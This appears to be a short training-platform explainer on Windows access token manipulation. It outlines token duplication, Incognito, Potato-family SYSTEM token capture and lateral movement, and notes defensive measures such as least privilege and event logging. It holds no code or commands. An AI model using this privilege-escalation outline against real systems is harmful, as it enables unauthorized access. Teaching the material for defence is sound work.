Windows Token Manipulation
Techniques for stealing and forging Windows access tokens to impersonate users and escalate privileges.
Techniques for stealing and forging Windows access tokens to impersonate users and escalate privileges.
Continue your mission
Windows token manipulation involves stealing, duplicating, or forging access tokens to impersonate other users or escalate privileges. Access tokens are the fundamental authorization mechanism in Windows, containing the security context under which threads and processes run.
Every Windows process has an access token containing the user SID, group memberships, and privileges. Attackers with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege can duplicate tokens from other processes and apply them to their own threads. The technique involves opening a target process, duplicating its token, and creating a new process with the stolen token. Tools like Incognito enumerate available tokens on a system and impersonate them. Potato family techniques force the SYSTEM account to authenticate to an attacker-controlled service, capturing and reusing the SYSTEM token. Token manipulation also enables lateral movement by impersonating logged-on users whose tokens are cached.
Token manipulation is a cornerstone of Windows post-exploitation. Service accounts frequently hold SeImpersonatePrivilege, meaning any compromised web server, database, or application service can potentially escalate to SYSTEM. Understanding token mechanics is critical for defenders configuring service accounts, auditing privilege assignments, and detecting suspicious token operations through event logging.
CDA examines token manipulation within the IAT domain as part of identity-based attack techniques. Theater missions include scenarios where operators must both exploit and defend against token-based attacks. Training emphasizes least privilege for service accounts and monitoring token-related events.
CDA Theater missions that address topics covered in this article.
LLM security risks include data leakage, prompt injection, model supply chain attacks, and unauthorized tool execution, requiring organizations to treat AI models as high-privilege components.
How physical security failures enable cyber attacks, from tailgating and shoulder surfing to device theft and dumpster diving.
Written by CDA Editorial
Found an issue? Help improve this article.